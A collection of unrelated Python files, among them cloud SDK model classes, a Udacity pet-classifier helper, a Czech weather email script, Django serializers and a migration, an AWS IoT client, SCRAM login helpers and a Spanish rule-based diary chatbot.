'Error',
'ErrorDetails',
'ErrorResponse', 'ErrorResponseException',
'Experiment',
'ExperimentUpdateModel',
'ForwardingConfiguration',
'FrontDoor',
'FrontDoorUpdateParameters',
'FrontendEndpoint',
'FrontendEndpointLink',
'FrontendEndpointUpdateParameters',
'FrontendEndpointUpdateParametersWebApplicationFirewallPolicyLink',
'HeaderAction',
'HealthProbeSettingsListResult',
'HealthProbeSettingsModel',
'HealthProbeSettingsUpdateParameters',
'KeyVaultCertificateSourceParametersVault',
'LatencyMetric',
'LatencyScorecard',
'LoadBalancingSettingsListResult',
'LoadBalancingSettingsModel',
'LoadBalancingSettingsUpdateParameters',
'ManagedRuleDefinition',
'ManagedRuleExclusion',
'ManagedRuleGroupDefinition',
'ManagedRuleGroupOverride',
'ManagedRuleOverride',
'ManagedRuleSet',
'ManagedRuleSetDefinition',
'ManagedRuleSetList',
'MatchCondition',
'PolicySettings',
'PreconfiguredEndpoint',
'Profile',
'ProfileUpdateModel',
'PurgeParameters',
'RedirectConfiguration',
'Resource',
'RouteConfiguration',
'RoutingRule',
'RoutingRuleLink',
'RoutingRuleListResult',
'RoutingRuleUpdateParameters',
'RoutingRuleUpdateParametersWebApplicationFirewallPolicyLink',
'RulesEngine',
'RulesEngineAction',
'RulesEngineMatchCondition',
'RulesEngineRule',
'RulesEngineUpdateParameters',
'SubResource',
'TagsObject',
'Timeseries',
'TimeseriesDataPoint',
'ValidateCustomDomainInput',
'ValidateCustomDomainOutput',
'WebApplicationFirewallPolicy',
'ProfilePaged',
'PreconfiguredEndpointPaged',
'ExperimentPaged',
'FrontDoorPaged',
'FrontendEndpointPaged',
'RulesEnginePaged',
'WebApplicationFirewallPolicyPaged',
'ManagedRuleSetDefinitionPaged',
'NetworkOperationStatus',
'NetworkExperimentResourceState',
'State',
'AggregationInterval',
'TimeseriesType',
'EndpointType',
'FrontDoorResourceState',
'CustomHttpsProvisioningState',
'CustomHttpsProvisioningSubstate',
'FrontDoorCertificateSource',
'MinimumTLSVersion',
'FrontDoorCertificateType',
'EnforceCertificateNameCheckEnabledState',
'FrontDoorEnabledState',
'FrontDoorProtocol',
'RoutingRuleEnabledState',
'FrontDoorForwardingProtocol',
'FrontDoorQuery',
'DynamicCompressionEnabled',
'FrontDoorRedirectType',
'FrontDoorRedirectProtocol',
'PrivateEndpointStatus',
'BackendEnabledState',
'FrontDoorHealthProbeMethod',
'HealthProbeEnabled',
'SessionAffinityEnabledState',
'HeaderActionType',
'RulesEngineMatchVariable',
'RulesEngineOperator',
'Transform',
'MatchProcessingBehavior',
'ResourceType',
'Availability',
'PolicyEnabledState',
'PolicyMode',
'CustomRuleEnabledState',
'RuleType',
'MatchVariable',
'Operator',
'TransformType',
'ActionType',
'ManagedRuleExclusionMatchVariable',
'ManagedRuleExclusionSelectorMatchOperator',
'ManagedRuleEnabledState',
'PolicyResourceState',
'LatencyScorecardAggregationInterval',
'TimeseriesAggregationInterval',
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# */AIPND-revision/intropyproject-classify-pet-images/adjust_results4_isadog.py
#
# PROGRAMMER: Mohamed Gamal AbdElKhalek
# DATE CREATED: 2/5/2020
# REVISED DATE:
# PURPOSE: Create a function adjust_results4_isadog that adjusts the results
# dictionary to indicate whether or not the pet image label is of-a-dog,
# and to indicate whether or not the classifier image label is of-a-dog.
# All dog labels from both the pet images and the classifier function
# will be found in the dognames.txt file. We recommend reading all the
# dog names in dognames.txt into a dictionary where the 'key' is the
# dog name (from dognames.txt) and the 'value' is one. If a label is
# found to exist within this dictionary of dog names then the label
# is of-a-dog, otherwise the label isn't of a dog. Alternatively one
# could also read all the dog names into a list and then if the label
# is found to exist within this list - the label is of-a-dog, otherwise
# the label isn't of a dog.
# This function inputs:
# -The results dictionary as results_dic within adjust_results4_isadog
# function and results for the function call within main.
# -The text file with dog names as dogfile within adjust_results4_isadog
# function and in_arg.dogfile for the function call within main.
# This function uses the extend function to add items to the list
# that's the 'value' of the results dictionary. You will be adding the
# whether or not the pet image label is of-a-dog as the item at index
# 3 of the list and whether or not the classifier label is of-a-dog as
# the item at index 4 of the list. Note we recommend setting the values
# at indices 3 & 4 to 1 when the label is of-a-dog and to 0 when the
# label isn't a dog.
#
##
# TODO 4: Define adjust_results4_isadog function below, specifically replace the None
# below by the function definition of the adjust_results4_isadog function.
# Notice that this function doesn't return anything because the
# results_dic dictionary that is passed into the function is a mutable
# data type so no return is needed.
#
def adjust_results4_isadog(results_dic, dogfile):
"""
Adjusts the results dictionary to determine if classifier correctly
classified images 'as a dog' or 'not a dog' especially when not a match.
Demonstrates if model architecture correctly classifies dog images even if
it gets dog breed wrong (not a match).
Parameters:
results_dic - Dictionary with 'key' as image filename and 'value' as a
List. Where the list will contain the following items:
index 0 = pet image label (string)
index 1 = classifier label (string)
index 2 = 1/0 (int) where 1 = match between pet image
and classifer labels and 0 = no match between labels
------ where index 3 & index 4 are added by this function -----
NEW - index 3 = 1/0 (int) where 1 = pet image 'is-a' dog and
0 = pet Image 'is-NOT-a' dog.
NEW - index 4 = 1/0 (int) where 1 = Classifier classifies image
'as-a' dog and 0 = Classifier classifies image
'as-NOT-a' dog.
dogfile - A text file that contains names of all dogs from the classifier
function and dog names from the pet image files. This file has
one dog name per line dog names are all in lowercase with
spaces separating the distinct words of the dog name. Dog names
from the classifier function can be a string of dog names separated
by commas when a particular breed of dog has multiple dog names
associated with that breed (ex. maltese dog, maltese terrier,
maltese) (string - indicates text file's filename)
Returns:
None - results_dic is mutable data type so no return needed.
"""
dog_labels = []
# Reads in dognames from file, 1 name per line & automatically closes file
with open(dogfile, "r") as infile:
# Reads in dognames from first line in file
for dog_label in infile:
dog_labels.append(dog_label.lower().strip())
for filename in results_dic.keys():
# If The reference label is of a dog then 4th element of list is 1 else is 0
results_dic[filename].append(int(results_dic[filename][0] in dog_labels))
# If The classified label is of a dog then 5th element of list is 1 else is 0
results_dic[filename].append(int(results_dic[filename][1] in dog_labels))
|
import argparse
import os
import sys
from dotenv import load_dotenv
from sendgrid.helpers.mail import Mail
from requests.exceptions import RequestException
from bude_hezky.content import content_builder
from bude_hezky.sender import email_sender
from bude_hezky.weather import weather_forecast
CITY_OPTION_KEY = 'mesto'
EMAIL_OPTION_KEY = 'email'
SUNNY_LIKE_CODES = [1, 2, 3, 4, 5, 6, 20, 21, 30]
parser = argparse.ArgumentParser()
parser.add_argument(CITY_OPTION_KEY, help='Město, kde bydlíš a kód státu (např. Prague,CZ). Můžeš zkusit i vesnici.')
parser.add_argument(f'--{EMAIL_OPTION_KEY}', help='E-mail, na který pošleme informaci, zda bude hezky.')
cli_arguments = vars(parser.parse_args())
load_dotenv()
api_key = os.getenv('WEATHER_API_KEY')
city = cli_arguments[CITY_OPTION_KEY]
to_email = cli_arguments[EMAIL_OPTION_KEY]
try:
tomorrow_forecasts = weather_forecast.get_forecasts_for_city(api_key, city)
except RequestException as e:
print(f'Počasí nezjištěno kvůli chybě: {e}')
sys.exit(1)
sunny_hours = weather_forecast.get_sunny_like_hours(tomorrow_forecasts)
if not sunny_hours:
print(':( Zítra raději zůstaň doma.')
sys.exit()
hours_string = ', '.join(str(s) for s in content_builder.build_sunny_ranges(sunny_hours))
final_message = content_builder.rreplace(f'Hurá! Zítra bude ve městě {city} hezky mezi {hours_string}. Běž třeba na kolo!', ', ', ' a ', 1)
print(final_message)
if to_email:
print('Posílám e-mail...')
message = Mail(
from_email='ivan@ikvasnica.com',
to_emails=to_email,
subject='Zítra bude hezky',
html_content=final_message
)
try:
email_sender.send_mail(message)
except email_sender.EmailNotSentException as e:
print(f'E-mail nemohl být poslán kvůli chybě: {e}')
sys.exit(1)
|
# Surround data with 9s so we don't have to take special care of edges while identifying low points
# Since it's a 9, even low points on the actual edges remain low points.
with open("data.txt") as f:
data = [[9] + [int(e) for e in row] + [9] for row in [list(x[:-1]) for x in f.readlines()]]
data = [[9] * (len(data[0]) + 2)] + data
data = data + [[9] * (len(data[0]) + 2)]
# identify low points
low_points = []
for y, row in enumerate(data):
for x, element in enumerate(row):
try:
if data[y][x+1] > element and data[y][x-1] > element and data[y+1][x] > element and data[y-1][x] > element:
low_points.append(element)
except IndexError: # edges are artifically added, so we can disregard them.
pass
print(f"Solution: {sum(low_points) + len(low_points)}.")
|
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from .ingress_gateway_traffic_route_rule import IngressGatewayTrafficRouteRule
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class HttpIngressGatewayTrafficRouteRule(IngressGatewayTrafficRouteRule):
"""
Rule for routing incoming ingress gateway traffic with HTTP protocol
"""
#: A constant which can be used with the path_type property of a HttpIngressGatewayTrafficRouteRule.
#: This constant has a value of "PREFIX"
PATH_TYPE_PREFIX = "PREFIX"
def __init__(self, **kwargs):
"""
Initializes a new HttpIngressGatewayTrafficRouteRule object with values from keyword arguments. The default value of the :py:attr:`~oci.service_mesh.models.HttpIngressGatewayTrafficRouteRule.type` attribute
of this class is ``HTTP`` and it should not be changed.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param type:
The value to assign to the type property of this HttpIngressGatewayTrafficRouteRule.
Allowed values for this property are: "HTTP", "TLS_PASSTHROUGH", "TCP", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type type: str
:param ingress_gateway_host:
The value to assign to the ingress_gateway_host property of this HttpIngressGatewayTrafficRouteRule.
:type ingress_gateway_host: oci.service_mesh.models.IngressGatewayHostRef
:param destinations:
The value to assign to the destinations property of this HttpIngressGatewayTrafficRouteRule.
:type destinations: list[oci.service_mesh.models.VirtualServiceTrafficRuleTarget]
:param path:
The value to assign to the path property of this HttpIngressGatewayTrafficRouteRule.
:type path: str
:param path_type:
The value to assign to the path_type property of this HttpIngressGatewayTrafficRouteRule.
Allowed values for this property are: "PREFIX", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type path_type: str
:param is_grpc:
The value to assign to the is_grpc property of this HttpIngressGatewayTrafficRouteRule.
:type is_grpc: bool
:param is_host_rewrite_enabled:
The value to assign to the is_host_rewrite_enabled property of this HttpIngressGatewayTrafficRouteRule.
:type is_host_rewrite_enabled: bool
:param is_path_rewrite_enabled:
The value to assign to the is_path_rewrite_enabled property of this HttpIngressGatewayTrafficRouteRule.
:type is_path_rewrite_enabled: bool
"""
self.swagger_types = {
'type': 'str',
'ingress_gateway_host': 'IngressGatewayHostRef',
'destinations': 'list[VirtualServiceTrafficRuleTarget]',
'path': 'str',
'path_type': 'str',
'is_grpc': 'bool',
'is_host_rewrite_enabled': 'bool',
'is_path_rewrite_enabled': 'bool'
}
self.attribute_map = {
'type': 'type',
'ingress_gateway_host': 'ingressGatewayHost',
'destinations': 'destinations',
'path': 'path',
'path_type': 'pathType',
'is_grpc': 'isGrpc',
'is_host_rewrite_enabled': 'isHostRewriteEnabled',
'is_path_rewrite_enabled': 'isPathRewriteEnabled'
}
self._type = None
self._ingress_gateway_host = None
self._destinations = None
self._path = None
self._path_type = None
self._is_grpc = None
self._is_host_rewrite_enabled = None
self._is_path_rewrite_enabled = None
self._type = 'HTTP'
@property
def path(self):
"""
Gets the path of this HttpIngressGatewayTrafficRouteRule.
Route to match
:return: The path of this HttpIngressGatewayTrafficRouteRule.
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""
Sets the path of this HttpIngressGatewayTrafficRouteRule.
Route to match
:param path: The path of this HttpIngressGatewayTrafficRouteRule.
:type: str
"""
self._path = path
@property
def path_type(self):
"""
Gets the path_type of this HttpIngressGatewayTrafficRouteRule.
Match type for the route
Allowed values for this property are: "PREFIX", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The path_type of this HttpIngressGatewayTrafficRouteRule.
:rtype: str
"""
return self._path_type
@path_type.setter
def path_type(self, path_type):
"""
Sets the path_type of this HttpIngressGatewayTrafficRouteRule.
Match type for the route
:param path_type: The path_type of this HttpIngressGatewayTrafficRouteRule.
:type: str
"""
allowed_values = ["PREFIX"]
if not value_allowed_none_or_none_sentinel(path_type, allowed_values):
path_type = 'UNKNOWN_ENUM_VALUE'
self._path_type = path_type
@property
def is_grpc(self):
"""
Gets the is_grpc of this HttpIngressGatewayTrafficRouteRule.
If true, the rule will check that the content-type header has a application/grpc
or one of the various application/grpc+ values.
:return: The is_grpc of this HttpIngressGatewayTrafficRouteRule.
:rtype: bool
"""
return self._is_grpc
@is_grpc.setter
def is_grpc(self, is_grpc):
"""
Sets the is_grpc of this HttpIngressGatewayTrafficRouteRule.
If true, the rule will check that the content-type header has a application/grpc
or one of the various application/grpc+ values.
:param is_grpc: The is_grpc of this HttpIngressGatewayTrafficRouteRule.
:type: bool
"""
self._is_grpc = is_grpc
@property
def is_host_rewrite_enabled(self):
"""
Gets the is_host_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
If true, the hostname will be rewritten to the target virtual deployment's DNS hostname.
:return: The is_host_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
:rtype: bool
"""
return self._is_host_rewrite_enabled
@is_host_rewrite_enabled.setter
def is_host_rewrite_enabled(self, is_host_rewrite_enabled):
"""
Sets the is_host_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
If true, the hostname will be rewritten to the target virtual deployment's DNS hostname.
:param is_host_rewrite_enabled: The is_host_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
:type: bool
"""
self._is_host_rewrite_enabled = is_host_rewrite_enabled
@property
def is_path_rewrite_enabled(self):
"""
Gets the is_path_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
If true, the matched path prefix will be rewritten to '/' before being directed to the target virtual deployment.
:return: The is_path_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
:rtype: bool
"""
return self._is_path_rewrite_enabled
@is_path_rewrite_enabled.setter
def is_path_rewrite_enabled(self, is_path_rewrite_enabled):
"""
Sets the is_path_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
If true, the matched path prefix will be rewritten to '/' before being directed to the target virtual deployment.
:param is_path_rewrite_enabled: The is_path_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
:type: bool
"""
self._is_path_rewrite_enabled = is_path_rewrite_enabled
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
# -*- coding: utf-8 -*-
from rest_framework import serializers
from .models import Country, Event
class CountrySerializer(serializers.ModelSerializer):
class Meta:
model = Country
fields = ["id", "name", "url"]
class EventSerializer(serializers.ModelSerializer):
latitude = serializers.DecimalField(max_digits=8, decimal_places=6,
min_value=-90, max_value=90)
longitude = serializers.DecimalField(max_digits=9, decimal_places=6,
min_value=-180, max_value=180)
class Meta:
model = Event
fields = [
"id", "country", "name", "slug",
"is_juniors", "is_restricted", "is_discontinued",
"latitude", "longitude"
]
|
'''
/*
* Copyright 2010-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
'''
import time, json
from os import path, environ, name
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient
# Custom MQTT message callback
def customCallback(client, userdata, message):
print("--start--")
shadow_state = json.loads(message.payload)
for value in shadow_state['state']['reported']:
for element in shadow_state['state']['reported'][value]:
print(element['timedate'][:-4], element['msg'])
print("--end--")
# Get path to client-files
if name == 'nt':
path_iot = path.join(environ['localappdata'], "LTS AS", "iot")
else:
path_iot = environ['HOMEPATH']+"/config/iot/"
with open(path.join(path_iot, 'conf.json'), "r") as f:
config = json.loads(f.read())
host = config['host']
rootCAPath = path.join(path_iot, 'root-CA.crt')
certificatePath = path.join(path_iot, 'certificate.pem.crt')
privateKeyPath = path.join(path_iot, 'private.pem.key')
client_id = config['client_id']
# Init AWSIoTMQTTClient
myAWSIoTMQTTClient = None
myAWSIoTMQTTClient = AWSIoTMQTTClient(client_id)
myAWSIoTMQTTClient.configureEndpoint(host, 8883)
myAWSIoTMQTTClient.configureCredentials(rootCAPath, privateKeyPath, certificatePath)
# AWSIoTMQTTClient connection configuration
myAWSIoTMQTTClient.configureAutoReconnectBackoffTime(1, 32, 20)
myAWSIoTMQTTClient.configureOfflinePublishQueueing(-1) # Infinite offline Publish queueing
myAWSIoTMQTTClient.configureDrainingFrequency(2) # Draining: 2 Hz
myAWSIoTMQTTClient.configureConnectDisconnectTimeout(10) # 10 sec
myAWSIoTMQTTClient.configureMQTTOperationTimeout(5) # 5 sec
# Connect and subscribe to AWS IoT
myAWSIoTMQTTClient.connect()
myAWSIoTMQTTClient.subscribe('$aws/things/no-lts-ws1/shadow/get/accepted', 1, customCallback)
# Publish to the same topic in a loop forever
myAWSIoTMQTTClient.publish('$aws/things/no-lts-ws1/shadow/get', None, 1)
time.sleep(5)
|
import uuid
import hashlib
import hmac
from binascii import hexlify
import math
import base64
from Crypto.Cipher import PKCS1_v1_5
from Crypto.PublicKey.RSA import construct
def generate_nonce():
""" generate random clientside nonce """
return uuid.uuid4().hex + uuid.uuid4().hex
def get_client_proof(clientnonce, servernonce, password, salt, iterations):
""" calculates server client proof (part of the SCRAM algorithm) """
msg = "%s,%s,%s" % (clientnonce, servernonce, servernonce)
salted_pass = hashlib.pbkdf2_hmac(
'sha256', password, bytearray.fromhex(salt), iterations)
client_key = hmac.new(b'Client Key', msg=salted_pass,
digestmod=hashlib.sha256)
stored_key = hashlib.sha256()
stored_key.update(client_key.digest())
signature = hmac.new(msg.encode('utf_8'),
msg=stored_key.digest(), digestmod=hashlib.sha256)
client_key_digest = client_key.digest()
signature_digest = signature.digest()
client_proof = bytearray()
i = 0
while i < client_key.digest_size:
client_proof.append(ord(client_key_digest[i]) ^ ord(signature_digest[i]))
i = i + 1
return hexlify(client_proof)
def rsa_encrypt(rsae, rsan, data):
if (data is None or data == ''): return ''
N = long(rsan,16)
E = long(rsae,16)
b64data = base64.b64encode(data)
pubkey = construct((N, E))
cipher = PKCS1_v1_5.new(pubkey)
blocks = int(math.ceil(len(b64data) / 245.0))
result = []
for i in range(blocks):
block = b64data[i*245:(i+1)*245]
d = cipher.encrypt(block)
result.append(d)
result = hexlify(''.join(result))
if ((len(result) & 1) == 0):
return result
else:
return '0'+result
|
# Generated by Django 3.1.7 on 2021-10-27 17:39
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('donations', '0016_auto_20210522_1336'),
]
operations = [
migrations.CreateModel(
name='Donor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=250)),
('pseudonym', models.TextField(blank=True)),
('email', models.EmailField(max_length=254)),
('address', models.TextField(blank=True)),
('zip_code', models.CharField(blank=True, max_length=5)),
('city', models.CharField(blank=True, max_length=50)),
('country', models.TextField(blank=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
migrations.AddField(
model_name='donation',
name='donor',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='donations.donor'),
),
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import random
import sys
import unicodedata
import my_conexion
sys.stdout.encoding
'UTF-8'
# PROCESAR MENSAJE DE USUARIO
def generarRespuesta(mensaje, STATES, username):
message_=sinAcentos(mensaje)
ans=''
vez = STATES['vez']
print(message_)
SALUDO = re.compile('^(h|H)ola|HOLA|(Q|q)u(e|é)\stal|QU(É|E)\sTAL|((B|b)uenas)|BUENAS|(Q|q)u(e|é)\sonda|QU(E|É)\sONDA|(H|h)ello|HELLO|(H|h)i|HI|(Q|q)iubo|QUIUBO|(S|s)aludos|SALUDOS|(B|b)uenos\sd(i|í)as|BUENOS\sD(I|Í)AS($|.*)');
SALUDO_MATCH = re.match(SALUDO,message_)
if SALUDO_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nHola, soy DiarioBot, me encantaria platicar contigo..."
if ev == 2:
ans =ans + "\nHola, yo soy tu diario personal..."
if ev == 3:
ans =ans + "\nHola, vamos a platicar..."
SENTIMIENTO = re.compile('(.*|^)((E|e)stoy|(M|m)e\s(fue|(S|s)iento)|puse|sent(i|í))(.*|(M|m)uy)\s((F|f)el(i\í)z|(C|c)ontent(o|a)|(A|a)legre|(B|b)ien)($|.*)');
SENTIMIENTO_MATCH = re.match(SENTIMIENTO,message_)
if SENTIMIENTO_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nMe alegra que te sientas así, espero todos los días te sientas de esa manera, ¿Que más pasó?..."
if ev == 2:
ans =ans + "\nQue bueno que estes así, ¿Que mas pasó?..."
if ev == 3:
ans =ans + "\nMuy bien, que siempre sea así, ¿Que mas pasó?..."
SENTIMIENTO_1 = re.compile('(.*|^)((E|e)stoy|(M|m)e\s(fue|(S|s)iento)|puse|sent(i|í))(.*|(M|m)uy)\s((T|t)riste|(M|m)al|(I|i)nfel(i|í)z|(D|d)ecaid(o|a))($|.*)');
SENTIMIENTO_MATCH = re.match(SENTIMIENTO_1,message_)
if SENTIMIENTO_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nNo me gusta que te sientas asi animo, Cuenta me más..."
if ev == 2:
ans =ans + "\nQue mal en serio, Cuenta me más..."
if ev == 3:
ans =ans + "\nNo te preocupes, se que estaras mejor mañana, Cuenta me más..."
NO_MAMA = re.compile('(.*|^)(fallecio|murio|no\stengo)(|\smi)\smam(a|á)($|.*)');
NO_MATCH = re.match(NO_MAMA,message_)
if NO_MATCH:
my_conexion.cambiar_estado('mama',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['mama'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['mama'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_MAMA = re.compile('(.*|^)mi\smam(a|á)\s(fallecio|murio)($|.*)');
NO_MATCH = re.match(NO_MAMA,message_)
if NO_MATCH:
my_conexion.cambiar_estado('mama',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['mama'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['mama'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_PAPA = re.compile('(.*|^)(falleci(o|ó)|muri(o|ó)|no\stengo)(|\smi)\spap(a|á)($|.*)');
NO_MATCH = re.match(NO_PAPA,message_)
if NO_MATCH:
my_conexion.cambiar_estado('papa',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['papa'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['papa'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_PAPA = re.compile('(.*|^)mi\spap(a|á)\s(fallecio|murio)($|.*)');
NO_MATCH = re.match(NO_PAPA,message_)
if NO_MATCH:
my_conexion.cambiar_estado('papa',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['papa'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['papa'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_HERMA = re.compile('(.*|^)(fallecio|murio|no\stengo)(|\smi)\sherman(o|a)($|.*)');
NO_MATCH = re.match(NO_PAPA,message_)
if NO_MATCH:
my_conexion.cambiar_estado('hermano',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['hermano'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['hermano'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_HERMA = re.compile('(.*|^)mi\sherman(o|a)\s(fallecio|murio)($|.*)');
NO_MATCH = re.match(NO_PAPA,message_)
if NO_MATCH:
my_conexion.cambiar_estado('hermano',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['hermano'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['hermano'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_MAS = re.compile('(.*|^)(fallecio|murio|no\stengo)(|\smi)\s(mascota|perro|gato|pajaro|pez|rana|tortuga|iguana)($|.*)');
NO_MATCH = re.match(NO_MAS,message_)
if NO_MATCH:
my_conexion.cambiar_estado('mascota',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['mascota'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['mascota'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_MAS = re.compile('(.*|^)mi\s(mascota|perro|gato|pajaro|pez|rana|tortuga|iguana)\s(fallecio|murio)($|.*)');
NO_MATCH = re.match(NO_MAS,message_)
if NO_MATCH:
my_conexion.cambiar_estado('mascota',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['mascota'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['mascota'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_AMI = re.compile('(.*|^)(fallecio|murio|no\stengo)(|\smi)\smejor amig(o|a)($|.*)');
NO_MATCH = re.match(NO_AMI,message_)
if NO_MATCH:
my_conexion.cambiar_estado('amigo',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['amigo'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['amigo'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_AMI = re.compile('(.*|^)mi\smejor amig(o|a)\s(fallecio|murio)($|.*)');
NO_MATCH = re.match(NO_AMI,message_)
if NO_MATCH:
my_conexion.cambiar_estado('amigo',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['amigo'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['amigo'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_TRA = re.compile('(.*|^)((no\strabajo)|(no\stengo\strabajo))($|.*)');
NO_MATCH = re.match(NO_TRA,message_)
if NO_MATCH:
my_conexion.cambiar_estado('trabajo',username)
STATES['trabajo'] = True
NO_ESC = re.compile('(.*|^)no\sestudio($|.*)');
NO_MATCH = re.match(NO_ESC,message_)
if NO_MATCH:
my_conexion.cambiar_estado('escuela',username)
STATES['escuela'] = True
MAMA = re.compile('(.*|^)((M|m)i\s(mama|mamá|madre)\s(es|esta)(.*|algo|un poco|mucho|mucho muy|muy)\s(excelente|bien|alegre|animada|apasionada|cariñosa|contenta|encantada|euforica|exitada|feliz|satisfecha|orgullosa))($|.*)');
MAMA_MATCH = re.match(MAMA,message_)
if MAMA_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nOh Que bien que tu mamá este asi..."
if ev == 2:
ans =ans + "\nMe alegra leer esto de tu mamá..."
if ev == 3:
ans =ans + "\nMaravilloso, que todo siga asi para tu mamá..."
STATES['mama'] = True
MAMA = re.compile('(.*|^)((M|m)i\s(mama|mamá|madre)\s(es|esta)(.*|algo|un poco|mucho|mucho muy|muy)\s(abrumada|mal|mala|enferma|afligida|agotada|amargada|angustiada|apatica|arrepentida|asustada|aterrada|avergonzada|celosa|cansada|confundida|debil|decaida|decepcionada|deprimida|desanimada|desesperada|enojada|infeliz|herida|insegura|triste|tensa|molesta|irritada))($|.*)');
MAMA_MATCH = re.match(MAMA,message_)
if MAMA_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nmmm que mal que tu mama este asi..."
if ev == 2:
ans =ans + "\nLo siento, que todo mejore para tu mamá..."
if ev == 3:
ans =ans + "\nLeer esto de tu mama no me gusta, lo siento por ella..."
STATES['mama'] = True
PAPA = re.compile('(.*|^)((M|m)i\s(papa|papá|padre)\s(es|esta)(.*|algo|un poco|mucho|mucho muy|muy)\s(excelente|bien|alegre|animado|apasionado|cariñoso|contento|encantado|euforico|exitado|feliz|satisfecho|orgullos))($|.*)');
PAPA_MATCH = re.match(PAPA,message_)
if PAPA_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nOh Que bien que tu papá este así..."
if ev == 2:
ans =ans + "\nMe alegra leer esto de tu papá..."
if ev == 3:
ans =ans + "\nMaravilloso, que todo siga asi para tu padre..."
STATES['papa'] = True
